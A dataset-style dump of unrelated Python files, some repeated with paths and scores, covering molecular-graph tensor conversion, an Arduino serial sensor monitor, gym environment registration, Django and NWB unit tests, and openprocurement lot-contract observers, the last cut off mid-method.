if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_nodes(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
'args' : {'value' : 0} }, with optional args but got",
value, "instead")
for key, value in edges.items():
if isinstance(value, str):
self._make_edges(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_edges(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
'args' : {'value' : 0} }, with optinal args but got",
value, "instead")
for key, value in state.items():
if isinstance(value, str):
self._make_state(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_state(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
'args' : {'value' : 0} }, with optinal args but got",
value, "instead")
return self
def to_tensor(self,
nodes=None,
edges=None,
state=None,
trafo_nodes=None,
trafo_edges=None,
trafo_state=None,
default_nodes=None,
default_edges=None,
default_state=None,
out_tensor=np.array
):
"""
Convert the nx graph into a dict of tensors which can be directly used for GCN.
The desired attributes must be given with a suitable conversion function plus default value.
Here, one can add also the type of tensor or one-Hot mappings etc. and its default/zero state,
if the attributes is not specified for a specific node/edge. The properties are always mapped to numpy arrays
and then converted to out_tensor.
Args:
nodes (list, optional): Nodes properties. Defaults to ['proton'].
edges (list, optional): Edge properties. Defaults to ['bond'].
state (list, optional): State Properties. Defaults to ['size'].
trafo_nodes (dict, optional): Transformation function for nodes. Defaults to np.array.
trafo_edges (dict, optional): Transformation function for edges. Defaults to np.array.
trafo_state (dict, optional): Transformation function for state. Defaults to np.array.
default_nodes (dict, optional): Zero Nodes properties. Defaults to np.array(0).
default_edges (dict, optional): Zero Edge properties. Defaults to np.array(0).
default_state (dict, optional): Zero State Properties. Defaults to np.array(0).
out_tensor (func) : Final Function for each node/edge/state. Default is np.array.
Returns:
dict: Graph tensors as dictionary.
"""
if nodes is None:
nodes = [self._mols_implemented[self.mol_type]['nodes'][0]]
if edges is None:
edges = [self._mols_implemented[self.mol_type]['edges'][0]]
if state is None:
state = [self._mols_implemented[self.mol_type]['state'][0]]
if trafo_nodes is None:
trafo_nodes = {}
if trafo_edges is None:
trafo_edges = {}
if trafo_state is None:
trafo_state = {}
if default_nodes is None:
default_nodes = {}
if default_edges is None:
default_edges = {}
if default_state is None:
default_state = {}
for x in nodes:
if x not in trafo_nodes:
trafo_nodes[x] = np.array
for x in edges:
if x not in trafo_edges:
trafo_edges[x] = np.array
for x in state:
if x not in trafo_state:
trafo_state[x] = np.array
for x in nodes:
if x not in default_nodes:
default_nodes[x] = np.array(0.0)
for x in edges:
if x not in default_edges:
default_edges[x] = np.array(0.0)
for x in state:
if x not in default_state:
default_state[x] = np.array(0.0)
outn = []
oute = []
outs = []
out_a = nx.to_numpy_array(self)
node_idx = np.array(list(self.nodes), dtype=np.int)
edge_idx = np.array(list(self.edges), dtype=np.int)
for i in node_idx:
current_node = []
for key in nodes:
if key in self.nodes[i]:
current_node.append(trafo_nodes[key](self.nodes[i][key]))
else:
current_node.append(default_nodes[key])
outn.append(current_node)
outn = np.array(outn)
for i in edge_idx:
current_edge = []
for key in edges:
if key in self.edges[i]:
current_edge.append(trafo_edges[key](self.edges[i][key]))
else:
current_edge.append(default_edges[key])
oute.append(current_edge)
oute = np.array(oute)
for key in state:
if key in self._graph_state:
outs.append(trafo_state[key](self._graph_state[key]))
else:
outs.append(default_state[key])
outs = np.array(outs)
# Make un-directed and sort edges and edge_index
outei, oute = add_edges_reverse_indices(edge_idx,oute)
return {"nodes": out_tensor(outn),
"edges": out_tensor(oute),
"state": out_tensor(outs),
"adjacency": out_tensor(out_a),
"indices": out_tensor(outei)}
# m = rdkit.Chem.MolFromSmiles("CC=O")
# test = MolGraph(m)
# test.make()
# nx.draw(test, with_labels=True)
# out = test.to_tensor() | 0.575111 | 0.367157 |
import os
import yaml
from pocs.utils.database import PanMongo
from pocs.utils.logger import get_root_logger
from pocs.utils.messaging import PanMessaging
from pocs.utils.rs232 import SerialData
from . import load_config
class ArduinoSerialMonitor(object):
"""
Monitors the serial lines and tries to parse any data recevied
as JSON.
Checks for the `camera_box` and `computer_box` entries in the config
and tries to connect. Values are updated in the mongo db.
"""
def __init__(self, auto_detect=False, *args, **kwargs):
self.config = load_config()
self.logger = get_root_logger()
assert 'environment' in self.config
assert type(self.config['environment']) is dict, \
self.logger.warning("Environment config variable not set correctly. No sensors listed")
self.db = None
self.messaging = None
# Store each serial reader
self.serial_readers = dict()
if auto_detect:
for port_num in range(9):
port = '/dev/ttyACM{}'.format(port_num)
if os.path.exists(port):
self.logger.debug("Trying to connect on {}".format(port))
sensor_name = None
serial_reader = self._connect_serial(port)
num_tries = 5
self.logger.debug("Getting name on {}".format(port))
while num_tries > 0:
try:
data = serial_reader.get_reading()
except yaml.parser.ParserError:
pass
except AttributeError:
pass
else:
try:
if 'name' in data:
sensor_name = data['name']
num_tries = 0
except Exception as e:
self.logger.warning("Read on serial: {}".format(e))
num_tries -= 1
if sensor_name is not None:
self.serial_readers[sensor_name] = {
'reader': serial_reader,
}
else:
# Try to connect to a range of ports
for sensor_name in self.config['environment'].keys():
try:
port = self.config['environment'][sensor_name]['serial_port']
except TypeError:
continue
except KeyError:
continue
serial_reader = self._connect_serial(port)
self.serial_readers[sensor_name] = {
'reader': serial_reader,
'port': port,
}
def _connect_serial(self, port):
if port is not None:
self.logger.debug('Attempting to connect to serial port: {}'.format(port))
serial_reader = SerialData(port=port, threaded=False)
self.logger.debug(serial_reader)
try:
serial_reader.connect()
serial_reader.start()
except Exception as e:
self.logger.warning('Could not connect to port: {}'.format(port))
return serial_reader
def disconnect(self):
for sensor_name, reader_info in self.serial_readers.items():
reader = reader_info['reader']
reader.stop()
def send_message(self, msg, channel='environment'):
if self.messaging is None:
self.messaging = PanMessaging.create_publisher(6510)
self.messaging.send_message(channel, msg)
def capture(self, use_mongo=True, send_message=True):
"""
Helper function to return serial sensor info.
Reads each of the connected sensors. If a value is received, attempts
to parse the value as json.
Returns:
sensor_data (dict): Dictionary of sensors keyed by sensor name.
"""
sensor_data = dict()
# Read from all the readers
for sensor_name, reader_info in self.serial_readers.items():
reader = reader_info['reader']
# Get the values
self.logger.debug("Reading next serial value")
try:
sensor_info = reader.get_reading()
except IndexError:
continue
time_stamp = sensor_info[0]
sensor_value = sensor_info[1]
try:
self.logger.debug("Got sensor_value from {}".format(sensor_name))
data = yaml.load(sensor_value.replace('nan', 'null'))
data['date'] = time_stamp
sensor_data[sensor_name] = data
if send_message:
self.send_message({'data': data}, channel='environment')
except yaml.parser.ParserError:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
except ValueError:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
except TypeError:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
except Exception as e:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
if use_mongo and len(sensor_data) > 0:
if self.db is None:
self.db = PanMongo()
self.logger.info('Connected to PanMongo')
self.db.insert_current('environment', sensor_data)
else:
self.logger.debug("No sensor data received")
return sensor_data | peas/sensors.py | import os
import yaml
from pocs.utils.database import PanMongo
from pocs.utils.logger import get_root_logger
from pocs.utils.messaging import PanMessaging
from pocs.utils.rs232 import SerialData
from . import load_config
class ArduinoSerialMonitor(object):
"""
Monitors the serial lines and tries to parse any data recevied
as JSON.
Checks for the `camera_box` and `computer_box` entries in the config
and tries to connect. Values are updated in the mongo db.
"""
def __init__(self, auto_detect=False, *args, **kwargs):
self.config = load_config()
self.logger = get_root_logger()
assert 'environment' in self.config
assert type(self.config['environment']) is dict, \
self.logger.warning("Environment config variable not set correctly. No sensors listed")
self.db = None
self.messaging = None
# Store each serial reader
self.serial_readers = dict()
if auto_detect:
for port_num in range(9):
port = '/dev/ttyACM{}'.format(port_num)
if os.path.exists(port):
self.logger.debug("Trying to connect on {}".format(port))
sensor_name = None
serial_reader = self._connect_serial(port)
num_tries = 5
self.logger.debug("Getting name on {}".format(port))
while num_tries > 0:
try:
data = serial_reader.get_reading()
except yaml.parser.ParserError:
pass
except AttributeError:
pass
else:
try:
if 'name' in data:
sensor_name = data['name']
num_tries = 0
except Exception as e:
self.logger.warning("Read on serial: {}".format(e))
num_tries -= 1
if sensor_name is not None:
self.serial_readers[sensor_name] = {
'reader': serial_reader,
}
else:
# Try to connect to a range of ports
for sensor_name in self.config['environment'].keys():
try:
port = self.config['environment'][sensor_name]['serial_port']
except TypeError:
continue
except KeyError:
continue
serial_reader = self._connect_serial(port)
self.serial_readers[sensor_name] = {
'reader': serial_reader,
'port': port,
}
def _connect_serial(self, port):
if port is not None:
self.logger.debug('Attempting to connect to serial port: {}'.format(port))
serial_reader = SerialData(port=port, threaded=False)
self.logger.debug(serial_reader)
try:
serial_reader.connect()
serial_reader.start()
except Exception as e:
self.logger.warning('Could not connect to port: {}'.format(port))
return serial_reader
def disconnect(self):
for sensor_name, reader_info in self.serial_readers.items():
reader = reader_info['reader']
reader.stop()
def send_message(self, msg, channel='environment'):
if self.messaging is None:
self.messaging = PanMessaging.create_publisher(6510)
self.messaging.send_message(channel, msg)
def capture(self, use_mongo=True, send_message=True):
"""
Helper function to return serial sensor info.
Reads each of the connected sensors. If a value is received, attempts
to parse the value as json.
Returns:
sensor_data (dict): Dictionary of sensors keyed by sensor name.
"""
sensor_data = dict()
# Read from all the readers
for sensor_name, reader_info in self.serial_readers.items():
reader = reader_info['reader']
# Get the values
self.logger.debug("Reading next serial value")
try:
sensor_info = reader.get_reading()
except IndexError:
continue
time_stamp = sensor_info[0]
sensor_value = sensor_info[1]
try:
self.logger.debug("Got sensor_value from {}".format(sensor_name))
data = yaml.load(sensor_value.replace('nan', 'null'))
data['date'] = time_stamp
sensor_data[sensor_name] = data
if send_message:
self.send_message({'data': data}, channel='environment')
except yaml.parser.ParserError:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
except ValueError:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
except TypeError:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
except Exception as e:
self.logger.warning("Bad JSON: {0}".format(sensor_value))
if use_mongo and len(sensor_data) > 0:
if self.db is None:
self.db = PanMongo()
self.logger.info('Connected to PanMongo')
self.db.insert_current('environment', sensor_data)
else:
self.logger.debug("No sensor data received")
return sensor_data | 0.573081 | 0.288851 |
import importlib
from inspect import getmembers
from pathlib import Path
import gym
def _get_envs(foldername=None, env_prefix=None, allow_list=None):
"""A helper function to get all environments in a folder.
Example usage:
_get_envs(foldername=None, env_prefix=None)
_get_envs(foldername='contrib', env_prefix='contrib')
The results still need to be manually cleaned up, so this is just a helper
Args:
foldername: str or None. If str, in the form of contrib, etc.
env_prefix: str or None, if not None, add this prefix to all env ids
allow_list: list of allowed env name, for manual curation
"""
if env_prefix is None:
env_prefix = ''
else:
if env_prefix[-1] != '.':
env_prefix = env_prefix + '.'
if allow_list is None:
allow_list = list()
# Root path of ngym_shaping.envs folder
env_root = Path(__file__).resolve().parent
lib_root = 'ngym_shaping.envs.'
if foldername is not None:
env_root = env_root / foldername
lib_root = lib_root + foldername + '.'
# Only take .py files
files = [p for p in env_root.iterdir() if p.suffix == '.py']
# Exclude files starting with '_'
files = [f for f in files if f.name[0] != '_']
filenames = [f.name[:-3] for f in files] # remove .py suffix
filenames = sorted(filenames)
env_dict = {}
for filename in filenames:
# lib = 'ngym_shaping.envs.collections.' + l
lib = lib_root + filename
module = importlib.import_module(lib)
for name, val in getmembers(module):
if name in allow_list:
env_dict[env_prefix + name + '-v0'] = lib + ':' + name
return env_dict
NATIVE_ALLOW_LIST = ['DR_stage']
ALL_NATIVE_ENVS = _get_envs(foldername=None, env_prefix=None,
allow_list=NATIVE_ALLOW_LIST)
ALL_EXTENDED_ENVS = ALL_NATIVE_ENVS
def all_envs(tag=None, psychopy=False, contrib=False, collections=False):
"""Return a list of all envs in ngym_shaping."""
envs = ALL_NATIVE_ENVS.copy()
env_list = sorted(list(envs.keys()))
if tag is None:
return env_list
else:
if not isinstance(tag, str):
raise ValueError('tag must be str, but got ', type(tag))
new_env_list = list()
for env in env_list:
from_, class_ = envs[env].split(':')
imported = getattr(__import__(from_, fromlist=[class_]), class_)
env_tag = imported.metadata.get('tags', [])
if tag in env_tag:
new_env_list.append(env)
return new_env_list
def all_tags():
return ['confidence', 'context dependent', 'continuous action space',
'delayed response', 'go-no-go', 'motor', 'perceptual', 'reaction time',
'multidimensional action space', 'n-alternative', 'two-alternative',
'steps action space', 'supervised', 'timing', 'value-based',
'working memory']
def _distance(s0, s1):
# Copyright (c) 2018 luozhouyang
if s0 is None:
raise TypeError("Argument s0 is NoneType.")
if s1 is None:
raise TypeError("Argument s1 is NoneType.")
if s0 == s1:
return 0.0
if len(s0) == 0:
return len(s1)
if len(s1) == 0:
return len(s0)
v0 = [0] * (len(s1) + 1)
v1 = [0] * (len(s1) + 1)
for i in range(len(v0)):
v0[i] = i
for i in range(len(s0)):
v1[0] = i + 1
for j in range(len(s1)):
cost = 1
if s0[i] == s1[j]:
cost = 0
v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
v0, v1 = v1, v0
return v0[len(s1)]
def make(id, **kwargs):
try:
return gym.make(id, **kwargs)
except gym.error.UnregisteredEnv:
all_ids = [env.id for env in gym.envs.registry.all()]
dists = [_distance(id, env_id) for env_id in all_ids]
# Python argsort
sort_inds = sorted(range(len(dists)), key=dists.__getitem__)
env_guesses = [all_ids[sort_inds[i]] for i in range(5)]
err_msg = 'No registered env with id: {}.\nDo you mean:\n'.format(id)
for env_guess in env_guesses:
err_msg += ' ' + env_guess + '\n'
raise gym.error.UnregisteredEnv(err_msg)
_all_gym_envs = [env.id for env in gym.envs.registry.all()]
def register(id, **kwargs):
if id not in _all_gym_envs:
gym.envs.registration.register(id=id, **kwargs)
for env_id, entry_point in ALL_EXTENDED_ENVS.items():
register(id=env_id, entry_point=entry_point) | ngym_shaping/envs/registration.py | import importlib
from inspect import getmembers
from pathlib import Path
import gym
def _get_envs(foldername=None, env_prefix=None, allow_list=None):
"""A helper function to get all environments in a folder.
Example usage:
_get_envs(foldername=None, env_prefix=None)
_get_envs(foldername='contrib', env_prefix='contrib')
The results still need to be manually cleaned up, so this is just a helper
Args:
foldername: str or None. If str, in the form of contrib, etc.
env_prefix: str or None, if not None, add this prefix to all env ids
allow_list: list of allowed env name, for manual curation
"""
if env_prefix is None:
env_prefix = ''
else:
if env_prefix[-1] != '.':
env_prefix = env_prefix + '.'
if allow_list is None:
allow_list = list()
# Root path of ngym_shaping.envs folder
env_root = Path(__file__).resolve().parent
lib_root = 'ngym_shaping.envs.'
if foldername is not None:
env_root = env_root / foldername
lib_root = lib_root + foldername + '.'
# Only take .py files
files = [p for p in env_root.iterdir() if p.suffix == '.py']
# Exclude files starting with '_'
files = [f for f in files if f.name[0] != '_']
filenames = [f.name[:-3] for f in files] # remove .py suffix
filenames = sorted(filenames)
env_dict = {}
for filename in filenames:
# lib = 'ngym_shaping.envs.collections.' + l
lib = lib_root + filename
module = importlib.import_module(lib)
for name, val in getmembers(module):
if name in allow_list:
env_dict[env_prefix + name + '-v0'] = lib + ':' + name
return env_dict
NATIVE_ALLOW_LIST = ['DR_stage']
ALL_NATIVE_ENVS = _get_envs(foldername=None, env_prefix=None,
allow_list=NATIVE_ALLOW_LIST)
ALL_EXTENDED_ENVS = ALL_NATIVE_ENVS
def all_envs(tag=None, psychopy=False, contrib=False, collections=False):
"""Return a list of all envs in ngym_shaping."""
envs = ALL_NATIVE_ENVS.copy()
env_list = sorted(list(envs.keys()))
if tag is None:
return env_list
else:
if not isinstance(tag, str):
raise ValueError('tag must be str, but got ', type(tag))
new_env_list = list()
for env in env_list:
from_, class_ = envs[env].split(':')
imported = getattr(__import__(from_, fromlist=[class_]), class_)
env_tag = imported.metadata.get('tags', [])
if tag in env_tag:
new_env_list.append(env)
return new_env_list
def all_tags():
return ['confidence', 'context dependent', 'continuous action space',
'delayed response', 'go-no-go', 'motor', 'perceptual', 'reaction time',
'multidimensional action space', 'n-alternative', 'two-alternative',
'steps action space', 'supervised', 'timing', 'value-based',
'working memory']
def _distance(s0, s1):
# Copyright (c) 2018 luozhouyang
if s0 is None:
raise TypeError("Argument s0 is NoneType.")
if s1 is None:
raise TypeError("Argument s1 is NoneType.")
if s0 == s1:
return 0.0
if len(s0) == 0:
return len(s1)
if len(s1) == 0:
return len(s0)
v0 = [0] * (len(s1) + 1)
v1 = [0] * (len(s1) + 1)
for i in range(len(v0)):
v0[i] = i
for i in range(len(s0)):
v1[0] = i + 1
for j in range(len(s1)):
cost = 1
if s0[i] == s1[j]:
cost = 0
v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
v0, v1 = v1, v0
return v0[len(s1)]
def make(id, **kwargs):
try:
return gym.make(id, **kwargs)
except gym.error.UnregisteredEnv:
all_ids = [env.id for env in gym.envs.registry.all()]
dists = [_distance(id, env_id) for env_id in all_ids]
# Python argsort
sort_inds = sorted(range(len(dists)), key=dists.__getitem__)
env_guesses = [all_ids[sort_inds[i]] for i in range(5)]
err_msg = 'No registered env with id: {}.\nDo you mean:\n'.format(id)
for env_guess in env_guesses:
err_msg += ' ' + env_guess + '\n'
raise gym.error.UnregisteredEnv(err_msg)
_all_gym_envs = [env.id for env in gym.envs.registry.all()]
def register(id, **kwargs):
if id not in _all_gym_envs:
gym.envs.registration.register(id=id, **kwargs)
for env_id, entry_point in ALL_EXTENDED_ENVS.items():
register(id=env_id, entry_point=entry_point) | 0.581065 | 0.209227 |
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='<EMAIL>', password='<PASSWORD>'):
"""Create a sample user"""
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
"""Test creating a new user with an email successful"""
email = '<EMAIL>'
password = '<PASSWORD>'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password, (password))
def test_new_user_email_normalized(self):
"""Test the new email for a user is normalized"""
email = '<EMAIL>'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
def test_new_user_invalid_email(self):
"""Test creating user with no email raises error"""
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test123')
def test_create_new_super_user(self):
"""Test creating a new superuser"""
user = get_user_model().objects.create_superuser(
'<EMAIL>',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_category_str(self):
"""Test the category string representation"""
category = models.Category.objects.create(
user=sample_user(),
name='Test Category'
)
self.assertEqual(str(category), category.name)
def test_work_str(self):
"""Test the work string representation"""
work = models.Work.objects.create(
user=sample_user(),
title='Fountain of Wisdom',
)
self.assertEqual(str(work), work.title)
@patch('uuid.uuid4')
def test_work_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.work_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/work/{uuid}.jpg'
self.assertEqual(file_path, exp_path) | app/core/tests/test_models.py | from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='<EMAIL>', password='<PASSWORD>'):
"""Create a sample user"""
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
"""Test creating a new user with an email successful"""
email = '<EMAIL>'
password = '<PASSWORD>'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password, (password))
def test_new_user_email_normalized(self):
"""Test the new email for a user is normalized"""
email = '<EMAIL>'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
def test_new_user_invalid_email(self):
"""Test creating user with no email raises error"""
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test123')
def test_create_new_super_user(self):
"""Test creating a new superuser"""
user = get_user_model().objects.create_superuser(
'<EMAIL>',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_category_str(self):
"""Test the category string representation"""
category = models.Category.objects.create(
user=sample_user(),
name='Test Category'
)
self.assertEqual(str(category), category.name)
def test_work_str(self):
"""Test the work string representation"""
work = models.Work.objects.create(
user=sample_user(),
title='Fountain of Wisdom',
)
self.assertEqual(str(work), work.title)
@patch('uuid.uuid4')
def test_work_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.work_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/work/{uuid}.jpg'
self.assertEqual(file_path, exp_path) | 0.72027 | 0.38523 |
import unittest
from datetime import datetime
import numpy as np
from dateutil.tz import tzlocal
from nwbwidgets.utils.units import get_min_spike_time, align_by_trials, align_by_time_intervals
from pynwb import NWBFile
from pynwb.epoch import TimeIntervals
class ShowPSTHTestCase(unittest.TestCase):
def setUp(self):
start_time = datetime(2017, 4, 3, 11, tzinfo=tzlocal())
create_date = datetime(2017, 4, 15, 12, tzinfo=tzlocal())
self.nwbfile = NWBFile(session_description='NWBFile for PSTH',
identifier='NWB123',
session_start_time=start_time,
file_create_date=create_date)
self.nwbfile.add_unit_column('location', 'the anatomical location of this unit')
self.nwbfile.add_unit_column('quality', 'the quality for the inference of this unit')
self.nwbfile.add_unit(id=1, spike_times=[2.2, 3.0, 4.5],
obs_intervals=[[1, 10]], location='CA1', quality=0.95)
self.nwbfile.add_unit(id=2, spike_times=[2.2, 3.0, 25.0, 26.0],
obs_intervals=[[1, 10], [20, 30]], location='CA3', quality=0.85)
self.nwbfile.add_unit(id=3, spike_times=[1.2, 2.3, 3.3, 4.5],
obs_intervals=[[1, 10], [20, 30]], location='CA1', quality=0.90)
self.nwbfile.add_trial_column(name='stim', description='the visual stimuli during the trial')
self.nwbfile.add_trial(start_time=0.0, stop_time=2.0, stim='person')
self.nwbfile.add_trial(start_time=3.0, stop_time=5.0, stim='ocean')
self.nwbfile.add_trial(start_time=6.0, stop_time=8.0, stim='desert')
def test_get_min_spike_time(self):
assert (get_min_spike_time(self.nwbfile.units) == 1.2)
def test_align_by_trials(self):
compare_to_at = [np.array([2.2, 3.0, 25.0, 26.0]), np.array([-0.8, 0., 22., 23.]),
np.array([-3.8, -3., 19., 20.])]
at = align_by_trials(self.nwbfile.units, index=1, before=20., after=30.)
np.testing.assert_allclose(at, compare_to_at, rtol=1e-02)
def test_align_by_time_intervals_Nonetrials_select(self):
time_intervals = TimeIntervals(name='Test Time Interval')
time_intervals.add_interval(start_time=21.0, stop_time=28.0)
time_intervals.add_interval(start_time=22.0, stop_time=26.0)
time_intervals.add_interval(start_time=22.0, stop_time=28.4)
ati = align_by_time_intervals(self.nwbfile.units, index=1, intervals=time_intervals,
stop_label=None, before=20., after=30.)
compare_to_ati = [np.array([-18.8, -18., 4., 5.]), np.array([-19.8, -19., 3., 4.]),
np.array([-19.8, -19., 3., 4.])]
np.testing.assert_array_equal(ati, compare_to_ati)
def test_align_by_time_intervals(self):
time_intervals = TimeIntervals(name='Test Time Interval')
time_intervals.add_interval(start_time=21.0, stop_time=28.0)
time_intervals.add_interval(start_time=22.0, stop_time=26.0)
time_intervals.add_interval(start_time=22.0, stop_time=28.4)
ati = align_by_time_intervals(self.nwbfile.units, index=1, intervals=time_intervals,
stop_label=None, before=20., after=30., rows_select=[0, 1])
compare_to_ati = [np.array([-18.8, -18., 4., 5.]), np.array([-19.8, -19., 3., 4.])]
np.testing.assert_array_equal(ati, compare_to_ati) | nwbwidgets/test/test_utils_units.py | import unittest
from datetime import datetime
import numpy as np
from dateutil.tz import tzlocal
from nwbwidgets.utils.units import get_min_spike_time, align_by_trials, align_by_time_intervals
from pynwb import NWBFile
from pynwb.epoch import TimeIntervals
class ShowPSTHTestCase(unittest.TestCase):
def setUp(self):
start_time = datetime(2017, 4, 3, 11, tzinfo=tzlocal())
create_date = datetime(2017, 4, 15, 12, tzinfo=tzlocal())
self.nwbfile = NWBFile(session_description='NWBFile for PSTH',
identifier='NWB123',
session_start_time=start_time,
file_create_date=create_date)
self.nwbfile.add_unit_column('location', 'the anatomical location of this unit')
self.nwbfile.add_unit_column('quality', 'the quality for the inference of this unit')
self.nwbfile.add_unit(id=1, spike_times=[2.2, 3.0, 4.5],
obs_intervals=[[1, 10]], location='CA1', quality=0.95)
self.nwbfile.add_unit(id=2, spike_times=[2.2, 3.0, 25.0, 26.0],
obs_intervals=[[1, 10], [20, 30]], location='CA3', quality=0.85)
self.nwbfile.add_unit(id=3, spike_times=[1.2, 2.3, 3.3, 4.5],
obs_intervals=[[1, 10], [20, 30]], location='CA1', quality=0.90)
self.nwbfile.add_trial_column(name='stim', description='the visual stimuli during the trial')
self.nwbfile.add_trial(start_time=0.0, stop_time=2.0, stim='person')
self.nwbfile.add_trial(start_time=3.0, stop_time=5.0, stim='ocean')
self.nwbfile.add_trial(start_time=6.0, stop_time=8.0, stim='desert')
def test_get_min_spike_time(self):
assert (get_min_spike_time(self.nwbfile.units) == 1.2)
def test_align_by_trials(self):
compare_to_at = [np.array([2.2, 3.0, 25.0, 26.0]), np.array([-0.8, 0., 22., 23.]),
np.array([-3.8, -3., 19., 20.])]
at = align_by_trials(self.nwbfile.units, index=1, before=20., after=30.)
np.testing.assert_allclose(at, compare_to_at, rtol=1e-02)
def test_align_by_time_intervals_Nonetrials_select(self):
time_intervals = TimeIntervals(name='Test Time Interval')
time_intervals.add_interval(start_time=21.0, stop_time=28.0)
time_intervals.add_interval(start_time=22.0, stop_time=26.0)
time_intervals.add_interval(start_time=22.0, stop_time=28.4)
ati = align_by_time_intervals(self.nwbfile.units, index=1, intervals=time_intervals,
stop_label=None, before=20., after=30.)
compare_to_ati = [np.array([-18.8, -18., 4., 5.]), np.array([-19.8, -19., 3., 4.]),
np.array([-19.8, -19., 3., 4.])]
np.testing.assert_array_equal(ati, compare_to_ati)
def test_align_by_time_intervals(self):
time_intervals = TimeIntervals(name='Test Time Interval')
time_intervals.add_interval(start_time=21.0, stop_time=28.0)
time_intervals.add_interval(start_time=22.0, stop_time=26.0)
time_intervals.add_interval(start_time=22.0, stop_time=28.4)
ati = align_by_time_intervals(self.nwbfile.units, index=1, intervals=time_intervals,
stop_label=None, before=20., after=30., rows_select=[0, 1])
compare_to_ati = [np.array([-18.8, -18., 4., 5.]), np.array([-19.8, -19., 3., 4.])]
np.testing.assert_array_equal(ati, compare_to_ati) | 0.59514 | 0.436142 |
from openprocurement_client.exceptions import (
ResourceNotFound,
)
from openprocurement.caravan.observers.base_observer import (
BaseObserverObservable,
ObserverObservableWithClient,
)
from openprocurement.caravan.observers.constants import (
CONTRACT_STATUS_MAPPING,
LOT_CONTRACT_TERMINAL_STATUSES,
)
from openprocurement.caravan.utils import (
search_lot_contract_by_related_contract, LOGGER
)
from openprocurement.caravan.observers.errors import (
LOT_CONTRACT_NOT_FOUND,
)
from openprocurement.caravan.constants import (
PATCH_LOT_CONTRACT_MSG,
LOT_OR_CONTRACT_NOT_FOUND_MSG,
SEARCH_LOT_CONTRACT_MSG
)
class LotContractChecker(ObserverObservableWithClient):
"""Adds lot's status to received message"""
def _activate(self, message):
if not message.get('error'):
return True
def _run(self, message):
LOGGER.info(
"Searching lot %s for contract related to %s contract",
message['lot_id'],
message['contract_id'],
extra={'MESSAGE_ID': SEARCH_LOT_CONTRACT_MSG}
)
lot_contract = None
try:
lot_contract = self._check_lot_contract(message)
except ResourceNotFound:
LOGGER.warning("Related contract not found: HTTP 404 error on the Lot resource")
result = self._prepare_error_message(LOT_CONTRACT_NOT_FOUND, message)
else:
if lot_contract is None: # contract not found
LOGGER.warning(
"Related contract not found: Lot model has not contract related to %s",
message['contract_id'],
)
return
LOGGER.info("Found %s contract", lot_contract.id)
result = self._prepare_message(lot_contract, message)
self._notify_observers(result)
def _check_lot_contract(self, message):
return search_lot_contract_by_related_contract(
self.client,
message['lot_id'],
message['contract_id']
)
def _prepare_message(self, lot_contract, recv_message):
recv_message.update({
'lot_contract_status': lot_contract.status,
'lot_contract_id': lot_contract.id
})
return recv_message
def _prepare_error_message(self, error, in_message):
if error == LOT_CONTRACT_NOT_FOUND:
in_message.update({'error': LOT_CONTRACT_NOT_FOUND})
return in_message
class LotContractPatcher(ObserverObservableWithClient):
def _activate(self, message):
if (
not message.get('error')
# skip already finished contracts
and not (message['lot_contract_status'] in LOT_CONTRACT_TERMINAL_STATUSES)
):
return True
def _run(self, message):
LOGGER.info(
"Patching lot contract %s of lot %s",
message['lot_contract_id'],
message['lot_id'],
extra={'MESSAGE_ID': PATCH_LOT_CONTRACT_MSG}
)
lot_conract = self._patch_lot_contract(message)
out_message = self._prepare_message(lot_conract, message)
self._notify_observers(out_message)
def _patch_lot_contract(self, message):
target_lot_contract_status = CONTRACT_STATUS_MAPPING.get(message['contract_status'])
contract = self.client.patch_contract(
message['lot_id'],
message['lot_contract_id'],
None,
{"data": {"status": target_lot_contract_status}}
)
return contract
def _prepare_message(self, lot_contract, recv_message):
recv_message.update({
'lot_contract_status': lot_contract.data.status
})
return recv_message
class LotContractAlreadyCompleteHandler(BaseObserverObservable):
def _activate(self, message):
if (
